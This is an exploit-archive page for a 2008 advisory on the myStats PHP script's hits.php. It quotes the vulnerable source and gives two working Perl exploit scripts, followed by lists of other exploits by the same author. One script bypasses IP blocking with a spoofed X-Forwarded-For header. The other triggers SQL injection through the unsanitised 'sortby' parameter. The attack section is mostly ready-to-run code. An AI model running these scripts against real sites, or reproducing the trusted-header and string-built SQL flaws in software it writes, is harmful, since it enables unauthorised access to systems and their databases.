Menu

Search for hundreds of thousands of exploits

"mystats - 'hits.php' Multiple Vulnerabilities"

Author

Exploit author

JosS

Platform

Exploit platform

php

Release date

Exploit published date

2008-10-15

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
# myStats (hits.php) Multiple Remote Vulnerabilities Exploit
# url: http://mywebland.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website

---------------------
Break System Block IP
---------------------

<<hits.php>>

7: if (@getenv("HTTP_X_FORWARDED_FOR")) 

   { $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); } 

   else { $u_ip = @getenv("REMOTE_ADDR"); } 



   if ($u_ip == BLOCK_IP) 

    { return 1; 

13:  exit; } 

<<config.php>>

11: define("BLOCK_IP", "127.0.0.1"); 

<<exploit.pl>>

use HTTP::Request;
use LWP::UserAgent;

my $web="http://localhost/hits.php";
my $ua=LWP::UserAgent->new();
$ua->default_header('X-Forwarded-For' => "127.1.1.1");
my $respuesta=HTTP::Request->new(GET=>$web);
$ua->timeout(30);
my $response=$ua->request($respuesta);
$contenido=$response->content;
if ($response->is_success)
{
open(FILE,">>results.txt");
print FILE "$contenido\n";
close(FILE);
print "\n[+] Exploit Succesful!\n\n";
}
else
{
print "\n[-] Exploit Failed!\n\n";
}

<<proof of concept>>

$ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP

-------------
SQL Injection
-------------

<<hits.php>>

63: if (isset($_GET['sortby']))

    {$sortby = $_GET['sortby'];}

    else

    { $sortby =  'timestamp' ;}


    $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ;

69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.<br>" . mysql_error());

<<exploit.pl>>

use HTTP::Request;
use LWP::UserAgent;

my $web="http://localhost/hits.php?sortby=1'";
my $ua=LWP::UserAgent->new();
my $respuesta=HTTP::Request->new(GET=>$web);
$ua->timeout(30);
my $response=$ua->request($respuesta);
$contenido=$response->content;
if ($response->is_success)
{
if($contenido =~ /You have an error in your SQL syntax;/)
{
print "\n[+] Exploit Succesful!\n";
print "\n[+] Content:\n";
print "$contenido\n\n";
}
}
else
{
print "\n[-] Exploit Failed!\n\n";
}

# milw0rm.com [2008-10-15]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2012-06-16 "Simple Document Management System 1.1.5 - Multiple SQL Injections" webapps php JosS
2010-09-10 "symphony 2.0.7 - Multiple Vulnerabilities" webapps php JosS
2010-08-29 "Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusions" webapps php JosS
2010-07-22 "AJ HYIP MERIDIAN - 'news.php?id' Blind SQL Injection" webapps php JosS
2010-07-22 "AJ HYIP PRIME - 'welcome.php?id' Blind SQL Injection" webapps php JosS
2010-04-16 "SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting" webapps php JosS
2010-03-29 "xwine 1.0.1 - '.exe' Local Crash (PoC)" dos linux JosS
2010-03-27 "Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute" webapps php JosS
2010-03-05 "E-topbiz Link ADS 1 PHP script - 'linkid' Blind SQL Injection" webapps php JosS
2010-03-03 "MiNBank 1.5.0 - Remote Command Execution" webapps php JosS
2009-06-24 "LightOpenCMS 0.1 - 'smarty.php?cwd' Local File Inclusion" webapps php JosS
2009-06-24 "PHPEcho CMS 2.0-rc3 - 'forum' Cross-Site Scripting Cookie Stealing / Blind SQL Injection" webapps php JosS
2009-04-20 "Studio Lounge Address Book 2.5 - 'profile' Arbitrary File Upload" webapps php JosS
2009-04-16 "SMA-DB 0.3.13 - Multiple Remote File Inclusions" webapps php JosS
2009-02-23 "pPIM 1.01 - 'notes.php' Remote Command Execution" webapps php JosS
2009-02-06 "1024 CMS 1.4.4 - Remote Command Execution / Remote File Inclusion" webapps php JosS
2009-02-04 "GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup" webapps asp JosS
2009-02-04 "gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass" webapps php JosS
2009-01-05 "Cybershade CMS 0.2b - 'index.php' Remote File Inclusion" webapps php JosS
2008-11-25 "Clean CMS 1.5 - Blind SQL Injection" webapps php JosS
2008-11-03 "pppBlog 0.3.11 - File Disclosure" webapps php JosS
2008-11-02 "Maran PHP Shop - 'prod.php' SQL Injection" webapps php JosS
2008-11-02 "Maran PHP Shop - 'admin.php' Insecure Cookie Handling" webapps php JosS
2008-11-01 "Bloggie Lite 0.0.2 Beta - Insecure Cookie Handling / SQL Injection" webapps php JosS
2008-10-23 "aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities" webapps php JosS
2008-10-21 "LightBlog 9.8 - 'GET' / 'POST' / 'COOKIE' Local File Inclusion" webapps php JosS
2008-10-16 "IP Reg 0.4 - Multiple SQL Injections" webapps php JosS
2008-10-16 "Kure 0.6.3 - 'index.php' Local File Inclusion" webapps php JosS
2008-10-15 "mystats - 'hits.php' Multiple Vulnerabilities" webapps php JosS
2008-10-15 "myEvent 1.6 - 'eventdate' SQL Injection" webapps php JosS
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.